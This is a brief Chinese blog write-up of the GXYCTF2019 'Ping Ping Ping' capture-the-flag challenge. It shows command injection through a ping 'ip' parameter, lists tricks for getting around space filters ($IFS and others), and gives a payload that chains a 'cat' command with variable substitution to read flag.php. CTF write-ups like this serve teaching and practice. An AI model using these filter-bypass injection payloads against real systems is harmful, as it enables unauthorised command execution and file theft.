[GXYCTF2019]Ping Ping Ping

 

题目提示ping ip
在这里插入图片描述
尝试读取flag.php
在这里插入图片描述
空格被禁,替换空格的方式有

< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

 

使用$IFS替换空格,再次读取flag.php
使用变量代换读取flag.php
payload为

?ip=127.0.0.1;b=lag;a=f;cat$IFS$a$b.php

 

具体参考自GXYCTF[2019]复现

posted @ 2020-05-13 10:14  山野村夫z1  阅读(258)  评论(0编辑  收藏  举报